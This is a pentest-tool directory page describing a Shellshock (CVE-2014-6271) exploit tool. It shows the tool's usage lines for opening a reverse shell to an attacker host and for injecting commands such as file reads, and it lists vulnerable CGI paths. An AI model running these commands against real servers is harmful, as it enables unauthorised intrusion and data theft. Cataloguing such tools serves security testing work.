Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
-CVE-2014-6271-Shellshock-Remote-Command-Injection- — [CVE-2014-6271] Apache Shellshock Remote Command Injection tool for quick reverse shell and file browsing | Kitploit
Tools/
GitHub
GitHub
/filipstudeny
/-cve-2014-6271-shellshock-remote-command-injection-
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubfilipstudeny/-cve-2014-6271-shellshock-remote-command-injection-

-CVE-2014-6271-Shellshock-Remote-Command-Injection-

[CVE-2014-6271] Apache Shellshock Remote Command Injection tool for quick reverse shell and file browsing

View Repository
3 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

[CVE-2014-6271] Shellshock-Remote-Command-Injection

[CVE-2014-6271] Apache Shellshock Remote Command Injection tool for quick reverse shell and file browsing

root@kitploit:~
Shellshock Apache remote exploit

Usage:
    ./Shellshock.py payload=reverse rhost=1.2.3.4 page=3 lhost=5.6.7.8 lport=1234
    ./Shellshock.py payload=files rhost=1.2.3.4 page=3 echo="ls -la"
    ./Shellshock.py payload=files rhost=1.2.3.4 page=3 echo="cat file.txt"

Variables:
    Victim:
        rhost => Victim IP
        rport => Victim PORT 
        
    Attacker (For reverse shell):
        lhost => Attacker IP
        lport => Attacker PORT for reverse shell 
    
    Echo:
        echo => Custom command to inject
        
        Examples:
            echo="ls -la"
            echo="cat file.txt"
        
    Config:
        pages => Specific cgi vulnerable pages 
            Exploitable pages:
                [0] /cgi-sys/entropysearch.cgi",
                [1] /cgi-sys/defaultwebpage.cgi",
                [2] /cgi-mod/index.cgi",
                [3] /cgi-bin/test.cgi",
                [4] /cgi-bin-sdb/printenv            
    Payloads:
        "reverse" => (unix unversal) TCP reverse shell (Requires: rhost, lhost, lport)
        "files" => Read and browse through files (Requires: rhost, echo)    
        
    Created by Filip Studený
Download Tool